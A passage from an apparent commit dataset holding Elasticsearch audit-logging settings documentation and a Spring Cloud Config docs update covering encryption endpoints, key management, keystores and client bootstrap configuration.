That is to say, this information\ndoes not exist in the `<clustername>_access.log` file.\nUnlike <<node.name,node name>>, whose value might change if the administrator\nchanges the setting in the config file, the node id will persist across cluster\nrestarts and the administrator cannot change it.\nThe default value is `true`.\n\n[[audit-event-ignore-policies]]\n==== Audit Logfile Event Ignore Policies\n\nThese settings affect the <<audit-log-ignore-policy,ignore policies>>\nthat enable fine-grained control over which audit events are printed to the log file.\nAll of the settings with the same policy name combine to form a single policy.\nIf an event matches all of the conditions for a specific policy, it is ignored \nand not printed.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.users`::\nA list of user names or wildcards. The specified policy will\nnot print audit events for users matching these values.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.realms`::\nA list of authentication realm names or wildcards. The specified policy will\nnot print audit events for users in these realms.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.roles`::\nA list of role names or wildcards. The specified policy will\nnot print audit events for users that have these roles. If the user has several\nroles, some of which are *not* covered by the policy, the policy will\n*not* cover this event.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.indices`::\nA list of index names or wildcards. The specified policy will\nnot print audit events when all the indices in the event match\nthese values. If the event concerns several indices, some of which are\n*not* covered by the policy, the policy will *not* cover this event.\n","old_contents":"[role=\"xpack\"]\n[[auditing-settings]]\n=== Auditing security settings\n++++\n<titleabbrev>Auditing settings<\/titleabbrev>\n++++\n\nYou configure security auditing settings in the `elasticsearch.yml` configuration file\non each node in the cluster. For more information, see <<enable-audit-logging>>.\n\n[[general-audit-settings]]\n==== General Auditing Settings\n\n`xpack.security.audit.enabled`::\nSet to `true` to enable auditing on the node. The default value is `false`.\nThis puts the auditing events in a dedicated file named `<clustername>_audit.json`\non each node. \n\n[[event-audit-settings]]\n==== Audited Event Settings\n\nThe events and some other information about what gets logged can be controlled\nby using the following settings:\n\n`xpack.security.audit.logfile.events.include`::\nSpecifies which events to include in the auditing output. The default value is:\n`access_denied, access_granted, anonymous_access_denied, authentication_failed,\nconnection_denied, tampered_request, run_as_denied, run_as_granted`.\n\n`xpack.security.audit.logfile.events.exclude`::\nExcludes the specified events from the output. By default, no events are\nexcluded.\n\n`xpack.security.audit.logfile.events.emit_request_body`::\nSpecifies whether to include the request body from REST requests on certain\nevent types such as `authentication_failed`. 
The default value is `false`.\n+\n--\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n--\n\n[[node-audit-settings]]\n==== Local Node Info Settings\n\n`xpack.security.audit.logfile.emit_node_name`::\nSpecifies whether to include the <<node.name,node name>> as a field in\neach audit event.\nThe default value is `true`.\n\n`xpack.security.audit.logfile.emit_node_host_address`::\nSpecifies whether to include the node's IP address as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_host_name`::\nSpecifies whether to include the node's host name as a field in each audit event.\nThe default value is `false`.\n\n`xpack.security.audit.logfile.emit_node_id`::\nSpecifies whether to include the node id as a field in each audit event.\nThis is available for the new format only. That is to say, this information\ndoes not exist in the `<clustername>_access.log` file.\nUnlike <<node.name,node name>>, whose value might change if the administrator\nchanges the setting in the config file, the node id will persist across cluster\nrestarts and the administrator cannot change it.\nThe default value is `true`.\n\n[[audit-event-ignore-policies]]\n==== Audit Logfile Event Ignore Policies\n\nThese settings affect the <<audit-log-ignore-policy,ignore policies>>\nthat enable fine-grained control over which audit events are printed to the log file.\nAll of the settings with the same policy name combine to form a single policy.\nIf an event matches all of the conditions for a specific policy, it is ignored \nand not printed.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.users`::\nA list of user names or wildcards. The specified policy will\nnot print audit events for users matching these values.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.realms`::\nA list of authentication realm names or wildcards. The specified policy will\nnot print audit events for users in these realms.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.roles`::\nA list of role names or wildcards. The specified policy will\nnot print audit events for users that have these roles. If the user has several\nroles, some of which are *not* covered by the policy, the policy will\n*not* cover this event.\n\n`xpack.security.audit.logfile.events.ignore_filters.<policy_name>.indices`::\nA list of index names or wildcards. The specified policy will\nnot print audit events when all the indices in the event match\nthese values. 
If the event concerns several indices, some of which are\n*not* covered by the policy, the policy will *not* cover this event.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a0b9fc6cedb8aef2eaaec6a9661ae575dfba1efb","subject":"Update docs to show encrypt key is mandatory","message":"Update docs to show encrypt key is mandatory\n","repos":"fangjing828\/spring-cloud-config,appleman\/spring-cloud-config,royclarkson\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,mstine\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,shakuzen\/spring-cloud-config,fkissel\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,appleman\/spring-cloud-config,marbon87\/spring-cloud-config,thomasdarimont\/spring-cloud-config,marbon87\/spring-cloud-config,mstine\/spring-cloud-config,spring-cloud\/spring-cloud-config,royclarkson\/spring-cloud-config,royclarkson\/spring-cloud-config,psbateman\/spring-cloud-config,spring-cloud\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,mstine\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"= Spring Cloud Config\n:toc:\n\ninclude::intro.adoc[]\n\n== Quick Start\n\ninclude::quickstart.adoc[]\n\n== Spring Cloud Config Server\n\nThe Server provides an HTTP, resource-based API for external\nconfiguration (name-value pairs, or equivalent YAML content). The\nserver is easily embeddable in a Spring Boot application using the\n`@EnableConfigServer` annotation.\n\n=== Environment Repository\n\nWhere do you want to store the configuration data for the Config\nServer? The strategy that governs this behaviour is the\n`EnvironmentRepository`, serving `Environment` objects. This\n`Environment` is a shallow copy of the domain from the Spring\n`Environment` (including `propertySources` as the main feature). The\n`Environment` resources are parametrized by three variables:\n\n\n* `{application}` maps to \"spring.application.name\" on the client side;\n\n* `{profile}` maps to \"spring.profiles.active\" on the client (comma separated list); and \n\n* `{label}` which is a server side feature labelling a \"versioned\" set of config files.\n\nRepository implementations generally behave just like a Spring Boot\napplication loading configuration files from a \"spring.config.name\"\nequal to the `{application}` parameter, and \"spring.profiles.active\"\nequal to the `{profiles}` parameter. Precedence rules for profiles are\nalso the same as in a regular Boot application: active profiles take\nprecedence over defaults, and if there are multiple profiles the last\none wins (like adding entries to a `Map`).\n\nExample: a client application has this bootstrap configuration:\n\n.bootstrap.yml\n----\nspring:\n application:\n name: foo\n profiles:\n active: dev,mysql\n----\n\n(as usual with a Spring Boot application, these properties could also\nbe set as environment variables or command line arguments). 
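\n\nFor instance, the same settings could be supplied from the command line instead of `bootstrap.yml` (an illustrative sketch: the upper-case names follow the standard Spring Boot relaxed-binding convention for environment variables, and `myapp.jar` is a placeholder):\n\n----\n$ SPRING_APPLICATION_NAME=foo SPRING_PROFILES_ACTIVE=dev,mysql java -jar myapp.jar\n----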
\n\nIf the repository is file-based, the server will create an\n`Environment` from `application.yml` (shared between all clients), and\n`foo.yml` (with `foo.yml` taking precedence). If the YAML files have\ndocuments inside them that point to Spring profiles, those are applied\nwith higher precedence (in order of the profiles listed), and if\nthere are profile-specific YAML (or properties) files these are also\napplied with higher precedence than the defaults. Higher precedence\ntranslates to a `PropertySource` listed earlier in the\n`Environment`. (These are the same rules as apply in a standalone\nSpring Boot application.)\n\n==== Git Backend\n\nThe default implementation of `EnvironmentRepository` uses a Git\nbackend, which is very convenient for managing upgrades and physical\nenvironments, and also for auditing changes. To change the location of\nthe repository you can set the \"spring.cloud.config.server.git.uri\"\nconfiguration property in the Config Server (e.g. in\n`application.yml`). If you set it with a `file:` prefix it should work\nfrom a local repository so you can get started quickly and easily\nwithout a server, but in that case the server operates directly on the\nlocal repository without cloning it (it doesn't matter if it's not\nbare because the Config Server never makes changes to the \"remote\"\nrepository). To scale the Config Server up and make it highly\navailable, you would need to have all instances of the server pointing\nto the same repository, so only a shared file system would work. Even\nin that case it is better to use the `ssh:` protocol for a shared\nfilesystem repository, so that the server can clone it and use a local\nworking copy as a cache.\n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a git label (commit id, branch name or tag).\n\n==== File System Backend\n\nThere is also a \"native\" profile in the Config Server that doesn't use\nGit, but just loads the config files from the local classpath or file\nsystem (any static URL you want to point to with\n\"spring.cloud.config.server.native.locations\"). To use the native\nprofile just launch the Config Server with\n\"spring.profiles.active=native\". \n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a suffix on the search path, so properties files are\nloaded from each search location *and* a subdirectory with the same\nname as the label (the labelled properties take precedence in the\nSpring Environment).\n\n=== Security\n\nYou are free to secure your Config Server in any way that makes sense\nto you (from physical network security to OAuth2 bearer\ntokens), and Spring Security and Spring Boot make it easy to do pretty\nmuch anything. \n\nTo use the default Spring Boot configured HTTP Basic security, just\ninclude Spring Security on the classpath (e.g. through\n`spring-boot-starter-security`). 
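\n\nFor example, with Maven this is a single extra dependency (a sketch; the version is assumed to be managed by the Spring Boot parent or its dependency management):\n\n----\n<dependency>\n  <groupId>org.springframework.boot<\/groupId>\n  <artifactId>spring-boot-starter-security<\/artifactId>\n<\/dependency>\n----\n\n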
The default is a username of \"user\"\nand a randomly generated password, which isn't going to be very useful\nin practice, so we recommend you configure the password (via\n`security.user.password`) and encrypt it (see below for instructions\non how to do that).\n\n=== Encryption and Decryption\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\nThe server exposes `\/encrypt` and `\/decrypt` endpoints (on the\nassumption that these will be secured and only accessed by authorized\nagents). If the remote property sources contain encrypted content\n(values starting with `{cipher}`) they will be decrypted before\nsending to clients over HTTP. The main advantage of this setup is\nthat the property values don't have to be in plain text when they are\n\"at rest\" (e.g. in a git repository). If a value cannot be decrypted\nit is replaced with an empty string, largely to prevent cipher text\nbeing used as a password in Spring Boot autoconfigured HTTP basic.\n\nIf you are setting up a remote config repository for config client\napplications it might contain an `application.yml` like this, for\ninstance:\n\n.application.yml\n----\nspring:\n datasource:\n username: dbuser\n password: {cipher}FKSAJDFGYOS8F7GLHAKERGFHLSAJ\n----\n\nYou can safely push this plain text to a shared git repository and the\nsecret password is protected.\n\nIf you are editing a remote config file you can use the Config Server\nto encrypt values by POSTing to the `\/encrypt` endpoint, e.g.\n\n----\n$ curl localhost:8888\/encrypt -d mysecret\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n----\n\nThe inverse operation is also available via `\/decrypt` (provided the server is\nconfigured with a symmetric key or a full key pair):\n\n----\n$ curl localhost:8888\/decrypt -d 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTake the encrypted value and add the `{cipher}` prefix before you put\nit in the YAML or properties file, and before you commit and push it\nto a remote, potentially insecure store.\n\nThe `spring` command line client (with Spring Cloud CLI extensions\ninstalled) can also be used to encrypt and decrypt, e.g.\n\n----\n$ spring encrypt mysecret --key foo\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n$ spring decrypt --key foo 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTo use a key in a file (e.g. an RSA public key for encryption) prepend\nthe key value with \"@\" and provide the file path, e.g.\n\n----\n$ spring encrypt mysecret --key @${HOME}\/.ssh\/id_rsa.pub\nAQAjPgt3eFZQXwt8tsHAVv\/QHiY5sI2dRcR+...\n----\n\nThe key argument is mandatory (despite having a `--` prefix).\n\n=== Key Management\n\nThe Config Server can use a symmetric (shared) key or an asymmetric\none (RSA key pair). The asymmetric choice is superior in terms of\nsecurity, but it is often more convenient to use a symmetric key since\nit is just a single property value to configure.\n\nTo configure a symmetric key you just need to set `encrypt.key` to a\nsecret String (or use an environment variable `ENCRYPT_KEY` to keep it\nout of plain text configuration files). 
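\n\nFor example (a minimal sketch; the key value is a placeholder, and in practice you would keep it out of the file via `ENCRYPT_KEY`):\n\n.application.yml\n----\nencrypt:\n  key: my-secret-key\n----\n\n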
You can also POST a key value\nto the `\/key` endpoint (but that won't change any existing encrypted\nvalues in remote repositories).\n\nTo configure an asymmetric key you can either set the key as a\nPEM-encoded text value (in `encrypt.key`), or via a keystore (e.g. as\ncreated by the `keytool` utility that comes with the JDK). The\nkeystore properties are `encrypt.keyStore.\\*` with `*` equal to\n\n* `location` (a `Resource` location), \n* `password` (to unlock the keystore) and \n* `alias` (to identify which key in the store is to be\nused).\n\nThe encryption is done with the public key, and a private key is\nneeded for decryption. Thus in principle you can configure only the\npublic key in the server if you only want to do encryption (and are\nprepared to decrypt the values yourself locally with the private\nkey). In practice you might not want to do that because it spreads the\nkey management process around all the clients, instead of\nconcentrating it in the server. On the other hand it's a useful option\nif your config server really is relatively insecure and only a\nhandful of clients need the encrypted properties.\n\n=== Creating a Key Store for Testing\n\nTo create a keystore for testing you can do something like this:\n\n----\n$ keytool -genkeypair -alias mytestkey -keyalg RSA \\\n -dname \"CN=Web Server,OU=Unit,O=Organization,L=City,S=State,C=US\" \\\n -keypass changeme -keystore server.jks -storepass letmein\n----\n\nPut the `server.jks` file in the classpath (for instance) and then in\nyour `application.yml` for the Config Server:\n\n----\nencrypt:\n keyStore:\n location: classpath:\/server.jks\n alias: mytestkey\n password: letmein\n----\n\n=== Embedding the Config Server\n\nThe Config Server runs best as a standalone application, but if you\nneed to you can embed it in another application. Just use the\n`@EnableConfigServer` annotation and (optionally) set\n`spring.cloud.config.server.prefix` to a path prefix, e.g. \"\/config\",\nto serve the resources under a prefix. The prefix should start but not\nend with a \"\/\". It is applied to the `@RequestMappings` in the Config\nServer (i.e. underneath the Spring Boot prefixes `server.servletPath`\nand `server.contextPath`).\n\n== Spring Cloud Config Client\n\nA Spring Boot application can take immediate advantage of the Spring\nConfig Server (or other external property sources provided by the\napplication developer), and it will also pick up some additional\nuseful features related to `Environment` change events.\n\n[[config-first-bootstrap]]\n=== Config First Bootstrap\n\nThis is the default behaviour for any application which has the Spring\nCloud Config Client on the classpath. 
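\n\nIn Maven terms that typically means declaring the config client starter (a sketch; `spring-cloud-starter-config` is the conventional artifact, with the version assumed to come from the Spring Cloud dependency management):\n\n----\n<dependency>\n  <groupId>org.springframework.cloud<\/groupId>\n  <artifactId>spring-cloud-starter-config<\/artifactId>\n<\/dependency>\n----\n\n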
When a config client starts up\nit binds to the Config Server (via the bootstrap configuration\nproperty `spring.cloud.config.uri`) and initializes Spring\n`Environment` with remote property sources.\n\nThe net result of this is that all client apps that want to consume\nthe Config Server need a `bootstrap.yml` (or an environment variable)\nwith the server address in `spring.cloud.config.uri` (defaults to\n\"http:\/\/localhost:8888\").\n\n[[eureka-first-bootstrap]]\n=== Eureka First Bootstrap\n\nIf you are using Spring Cloud Netflix and Eureka Service Discovery,\nthen you can have the Config Server register with Eureka if you want\nto, but in the default \"Config First\" mode, clients won't be able to\ntake advantage of the registration.\n\nIf you prefer to use Eureka to locate the Config Server, you can do\nthat by setting `spring.cloud.config.discovery.enabled=true` (default\n\"false\"). The net result of that is that client apps all need a\n`bootstrap.yml` (or an environment variable) with the Eureka server\naddress, e.g. in `eureka.client.serviceUrl.defaultZone`. The price\nfor using this option is an extra network round trip on start up to\nlocate the service registration. The benefit is that the Config Server\ncan change its co-ordinates, as long as Eureka is a fixed point.\n\n[[config-client-fail-fast]]\n=== Config Client Fail Fast\n\nIn some cases, it may be desirable to fail startup of a service if\nit cannot connect to the Config Server. If this is the desired\nbehavior, set the bootstrap configuration property\n`spring.cloud.config.failFast=true` and the client will halt with\nan Exception.\n\n=== Environment Changes\n\nThe application will listen for an `EnvironmentChangedEvent` and react\nto the change in a couple of standard ways (additional\n`ApplicationListeners` can be added as `@Beans` by the user in the\nnormal way). When an `EnvironmentChangedEvent` is observed it will\nhave a list of key values that have changed, and the application will\nuse those to:\n\n* Re-bind any `@ConfigurationProperties` beans in the context\n* Set the logger levels for any properties in `logging.level.*`\n\nNote that the Config Client does not by default poll for changes in\nthe `Environment`, and generally we would not recommend that approach\nfor detecting changes (although you could set it up with a\n`@Scheduled` annotation). If you have a scaled-out client application\nthen it is better to broadcast the `EnvironmentChangedEvent` to all\nthe instances instead of having them polling for changes (e.g. using\nthe https:\/\/github.com\/spring-cloud\/spring-cloud-bus[Spring Cloud\nBus]).\n\nThe `EnvironmentChangedEvent` covers a large class of refresh use\ncases, as long as you can actually make a change to the `Environment`\nand publish the event (those APIs are public and part of core\nSpring). You can verify the changes are bound to\n`@ConfigurationProperties` beans by visiting the `\/configprops`\nendpoint (normal Spring Boot Actuator feature). For instance a\n`DataSource` can have its `maxPoolSize` changed at runtime (the\ndefault `DataSource` created by Spring Boot is an\n`@ConfigurationProperties` bean) and grow capacity\ndynamically. Re-binding `@ConfigurationProperties` does not cover\nanother large class of use cases, where you need more control over the\nrefresh, and where you need a change to be atomic over the whole\n`ApplicationContext`. 
To address those concerns we have\n`@RefreshScope`.\n\n=== Refresh Scope\n\nA Spring `@Bean` that is marked as `@RefreshScope` will get special\ntreatment when there is a configuration change. This addresses the\nproblem of stateful beans that only get their configuration injected\nwhen they are initialized. For instance if a `DataSource` has open\nconnections when the database URL is changed via the `Environment`, we\nprobably want the holders of those connections to be able to complete\nwhat they are doing. Then the next time someone borrows a connection\nfrom the pool they get one with the new URL.\n\nRefresh scope beans are lazy proxies that initialize when they are\nused (i.e. when a method is called), and the scope acts as a cache of\ninitialized values. To force a bean to re-initialize on the next\nmethod call you just need to invalidate its cache entry.\n\nThe `RefreshScope` is a bean in the context and it has a public method\n`refreshAll()` to refresh all beans in the scope by clearing the\ntarget cache. There is also a `refresh(String)` method to refresh an\nindividual bean by name. This functionality is exposed in the\n`\/refresh` endpoint (over HTTP or JMX).\n\nNOTE: `@RefreshScope` works (technically) on an `@Configuration`\nclass, but it might lead to surprising behaviour: e.g. it does *not*\nmean that all the `@Beans` defined in that class are themselves\n`@RefreshScope`. Specifically, anything that depends on those beans\ncannot rely on them being updated when a refresh is initiated, unless\nit is itself in `@RefreshScope` (in which case it will be rebuilt on a\nrefresh and its dependencies re-injected, at which point they will be\nre-initialized from the refreshed `@Configuration`).\n\n=== Encryption and Decryption\n\nThe Config Client has an `Environment` pre-processor for decrypting\nproperty values locally. It follows the same rules as the Config\nServer, and has the same external configuration via `encrypt.\\*`. Thus\nyou can use encrypted values in the form `{cipher}*` and as long as\nthere is a valid key then they will be decrypted before the main\napplication context gets the `Environment`.\n\n=== Endpoints\n\nFor a Spring Boot Actuator application there are some additional management endpoints:\n\n* POST to `\/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels\n* `\/refresh` for re-loading the bootstrap context and refreshing the `@RefreshScope` beans\n* `\/restart` for closing the `ApplicationContext` and restarting it (disabled by default)\n* `\/pause` and `\/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`)\n\n\n=== Locating Remote Configuration Resources\n\nThe Config Service serves property sources from `\/{name}\/{env}\/{label}`, where the default bindings in the\nclient app are\n\n* \"name\" = `${spring.application.name}`\n* \"env\" = `${spring.profiles.active}` (actually `Environment.getActiveProfiles()`)\n* \"label\" = \"master\"\n\nAll of them can be overridden by setting `spring.cloud.config.\\*`\n(where `*` is \"name\", \"env\" or \"label\"). The \"label\" is useful for\nrolling back to previous versions of configuration; with the default\nConfig Server implementation it can be a git label, branch name or\ncommit id.\n\n=== The Bootstrap Application Context\n\nThe Config Client operates by creating a \"bootstrap\" application\ncontext, which is a parent context for the main application. 
Out of\nthe box it is responsible for loading configuration properties from\nthe Config Server, and also decrypting properties in the local\nexternal configuration files. The two contexts share an `Environment`\nwhich is the source of external properties for any Spring\napplication. Bootstrap properties are added with high precedence, so\nthey cannot be overridden by local configuration.\n\nThe bootstrap context uses a different convention for locating\nexternal configuration than the main application context, so instead\nof `application.yml` (or `.properties`) you use `bootstrap.yml`,\nkeeping the external configuration for bootstrap and main context\nnicely separate. Example:\n\n.bootstrap.yml\n----\nspring:\n application:\n name: foo\n cloud:\n config:\n uri: ${SPRING_CONFIG_URI:http:\/\/localhost:8888}\n----\n\nIt is a good idea to set the `spring.application.name` (in\n`bootstrap.yml` or `application.yml`) if your application needs any\napplication-specific configuration from the server.\n\nYou can disable the bootstrap process completely by setting\n`spring.cloud.bootstrap.enabled=false` (e.g. in System properties).\n\n=== Application Context Hierarchies\n\nIf you build an application context from `SpringApplication` or\n`SpringApplicationBuilder`, then the Bootstrap context is added as a\nparent to that context. It is a feature of Spring that child contexts\ninherit property sources and profiles from their parent, so the \"main\"\napplication context will contain additional property sources, compared\nto building the same context without Spring Cloud Config. The\nadditional property sources are:\n\n* \"bootstrap\": an optional `CompositePropertySource` appears with high\npriority if any `PropertySourceLocators` are found in the Bootstrap\ncontext, and they have non-empty properties. An example would be\nproperties from the Spring Cloud Config Server. See\nlink:#customizing-bootstrap-property-sources[below] for instructions\non how to customize the contents of this property source.\n\n* \"applicationConfig: [classpath:bootstrap.yml]\" (and friends if\nSpring profiles are active). If you have a `bootstrap.yml` (or\nproperties) then those properties are used to configure the Bootstrap\ncontext, and then they get added to the child context when its parent\nis set. They have lower precedence than the `application.yml` (or\nproperties) and any other property sources that are added to the child\nas a normal part of the process of creating a Spring Boot\napplication. See link:#customizing-bootstrap-properties[below] for\ninstructions on how to customize the contents of these property\nsources.\n\nBecause of the ordering rules of property sources the \"bootstrap\"\nentries take precedence, but note that these do not contain any data\nfrom `bootstrap.yml`, which has very low precedence, but can be used\nto set defaults.\n\nYou can extend the context hierarchy by simply setting the parent\ncontext of any `ApplicationContext` you create, e.g. using its own\ninterface, or with the `SpringApplicationBuilder` convenience methods\n(`parent()`, `child()` and `sibling()`). The bootstrap context will be\nthe parent of the most senior ancestor that you create yourself.\nEvery context in the hierarchy will have its own \"bootstrap\" property\nsource (possibly empty) to avoid promoting values inadvertently from\nparents down to their descendants. 
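\n\nA minimal sketch of building such a hierarchy with the builder methods named above (`ParentConfiguration` and `ChildConfiguration` are illustrative `@Configuration` classes):\n\n[source,java]\n----\nimport org.springframework.boot.builder.SpringApplicationBuilder;\n\npublic class Launcher {\n\n public static void main(String[] args) {\n \/\/ the bootstrap context becomes the parent of the most senior context created here\n new SpringApplicationBuilder(ParentConfiguration.class)\n .child(ChildConfiguration.class)\n .run(args);\n }\n\n}\n----\n\n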
Every context in the hierarchy can\nalso (in principle) have a different `spring.application.name` and\nhence a different remote property source if there is a Config\nServer. Normal Spring application context behaviour rules apply to\nproperty resolution: properties from a child context override those in\nthe parent, by name and also by property source name (if the child has\na property source with the same name as the parent, the one from the\nparent is not included in the child).\n\nNote that the `SpringApplicationBuilder` allows you to share an\n`Environment` amongst the whole hierarchy, but that is not the\ndefault. Thus, sibling contexts in particular do not need to have the\nsame profiles or property sources, even though they will share common\nthings with their parent. \n\n[[customizing-bootstrap-properties]]\n=== Changing the Location of Bootstrap Properties\n\nThe `bootstrap.yml` (or `.properties`) location can be specified using\n`spring.cloud.bootstrap.name` (default \"bootstrap\") or\n`spring.cloud.bootstrap.location` (default empty), e.g. in System\nproperties. Those properties behave like the `spring.config.*`\nvariants with the same name, in fact they are used to set up the\nbootstrap `ApplicationContext` by setting those properties in its\n`Environment`. If there is an active profile (from\n`spring.profiles.active` or through the `Environment` API in the\ncontext you are building) then properties in that profile will be\nloaded as well, just like in a regular Spring Boot app, e.g. from\n`bootstrap-development.properties` for a \"development\" profile.\n\n=== Customizing the Bootstrap Configuration\n\nThe bootstrap context can be trained to do anything you like by adding\nentries to `\/META-INF\/spring.factories` under the key\n`org.springframework.cloud.bootstrap.BootstrapConfiguration`. This is\na comma-separated list of Spring `@Configuration` classes which will\nbe used to create the context. Any beans that you want to be available\nto the main application context for autowiring can be created here,\nand also there is a special contract for `@Beans` of type\n`ApplicationContextInitializer`.\n\nThe bootstrap process ends by injecting initializers into the main\n`SpringApplication` instance (i.e. the normal Spring Boot startup\nsequence, whether it is running as a standalone app or deployed in an\napplication server). First a bootstrap context is created from the\nclasses found in `spring.factories` and then all `@Beans` of type\n`ApplicationContextInitializer` are added to the main\n`SpringApplication` before it is started.\n\n[[customizing-bootstrap-property-sources]]\n=== Customizing the Bootstrap Property Sources\n\nThe default property source for external configuration added by the\nbootstrap process is the Config Server, but you can add additional\nsources by adding beans of type `PropertySourceLocator` to the\nbootstrap context (via `spring.factories`). 
You could use this to\ninsert additional properties from a different server, or from a\ndatabase, for instance.\n\nAs an example, consider the following trivial custom locator:\n\n[source,java]\n----\n@Configuration\npublic class CustomPropertySourceLocator implements PropertySourceLocator {\n\n @Override\n public PropertySource<?> locate(Environment environment) {\n return new MapPropertySource(\"customProperty\",\n Collections.<String, Object>singletonMap(\"property.from.sample.custom.source\", \"worked as intended\"));\n }\n\n}\n----\n\nThe `Environment` that is passed in is the one for the\n`ApplicationContext` about to be created, i.e. the one that we are\nsupplying additional property sources for. It will already have its\nnormal Spring Boot-provided property sources, so you can use those to\nlocate a property source specific to this `Environment` (e.g. by\nkeying it on the `spring.application.name`, as is done in the default\nConfig Server property source locator).\n\nIf you create a jar with this class in it and then add a\n`META-INF\/spring.factories` containing:\n\n----\norg.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator\n----\n\nthen the \"customProperty\" `PropertySource` will show up in any\napplication that includes that jar on its classpath.\n\n=== Security\n\nIf you use HTTP Basic security on the server then clients just need to\nknow the password (and username if it isn't the default). You can do\nthat via the config server URI, or via separate username and password\nproperties, e.g.\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: https:\/\/user:secret@myconfig.mycompany.com\n----\n\nor\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: https:\/\/myconfig.mycompany.com\n username: user\n password: secret\n----\n\nThe `spring.cloud.config.password` and `spring.cloud.config.username`\nvalues override anything that is provided in the URI.\n\nIf you deploy your apps on Cloud Foundry then the best way to provide\nthe password is through service credentials, e.g. in the URI, since\nthen it doesn't even need to be in a config file. An example which\nworks locally and for a user-provided service on Cloud Foundry named\n\"configserver\":\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: ${vcap.services.configserver.credentials.uri:http:\/\/user:password@localhost:8888}\n\n----\n\nIf you use another form of security you might need to provide a\n`RestTemplate` to the `ConfigServicePropertySourceLocator` (e.g. by\ngrabbing it in the bootstrap context and injecting one).\n\n","old_contents":"= Spring Cloud Config\n:toc:\n\ninclude::intro.adoc[]\n\n== Quick Start\n\ninclude::quickstart.adoc[]\n\n== Spring Cloud Config Server\n\nThe Server provides an HTTP, resource-based API for external\nconfiguration (name-value pairs, or equivalent YAML content). The\nserver is easily embeddable in a Spring Boot application using the\n`@EnableConfigServer` annotation.\n\n=== Environment Repository\n\nWhere do you want to store the configuration data for the Config\nServer? The strategy that governs this behaviour is the\n`EnvironmentRepository`, serving `Environment` objects. This\n`Environment` is a shallow copy of the domain from the Spring\n`Environment` (including `propertySources` as the main feature). 
The\n`Environment` resources are parametrized by three variables:\n\n\n* `{application}` maps to \"spring.application.name\" on the client side;\n\n* `{profile}` maps to \"spring.active.profiles\" on the client (comma separated list); and \n\n* `{label}` which is a server side feature labelling a \"versioned\" set of config files.\n\nRepository implementations generally behave just like a Spring Boot\napplication loading configuration files from a \"spring.config.name\"\nequal to the `{application}` parameter, and \"spring.profiles.active\"\nequal to the `{profiles}` parameter. Precedence rules for profiles are\nalso the same as in a regular Boot application: active profiles take\nprecedence over defaults, and if there are multiple profiles the last\none wins (like adding entries to a `Map`).\n\nExample: a client application has this bootstrap configuration:\n\n.bootstrap.yml\n----\nspring:\n application:\n name: foo\n profiles:\n active: dev,mysql\n----\n\n(as usual with a Spring Boot application, these properties could also\nbe set as environment variables or command line arguments). \n\nIf the repository is file-based, the server will create an\n`Environment` from `application.yml` (shared between all clients), and\n`foo.yml` (with `foo.yml` taking precedence). If the YAML files have\ndocuments inside them that point to Spring profiles, those are applied\nwith higher precendence (in order of the profiles listed), and if\nthere are profile-specific YAML (or properties) files these are also\napplied with higher precedence than the defaults. Higher precendence\ntranslates to a `PropertySource` listed earlier in the\n`Environment`. (These are the same rules as apply in a standalone\nSpring Boot application.)\n\n==== Git Backend\n\nThe default implementation of `EnvironmentRepository` uses a Git\nbackend, which is very convenient for managing upgrades and physical\nenvironments, and also for auditing changes. To change the location of\nthe repository you can set the \"spring.cloud.config.server.git.uri\"\nconfiguration property in the Config Server (e.g. in\n`application.yml`). If you set it with a `file:` prefix it should work\nfrom a local repository so you can get started quickly and easily\nwithout a server, but in that case the server operates directly on the\nlocal repository without cloning it (it doesn't matter if it's not\nbare because the Config Server never makes changes to the \"remote\"\nrepository). To scale the Config Server up and make it highly\navailable, you would need to have all instances of the server pointing\nto the same repository, so only a shared file system would work. Even\nin that case it is better to use the `ssh:` protocol for a shared\nfilesystem repository, so that the server can clone it and use a local\nworking copy as a cache.\n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a git label (commit id, branch name or tag).\n\n==== File System Backend\n\nThere is also a \"native\" profile in the Config Server that doesn't use\nGit, but just loads 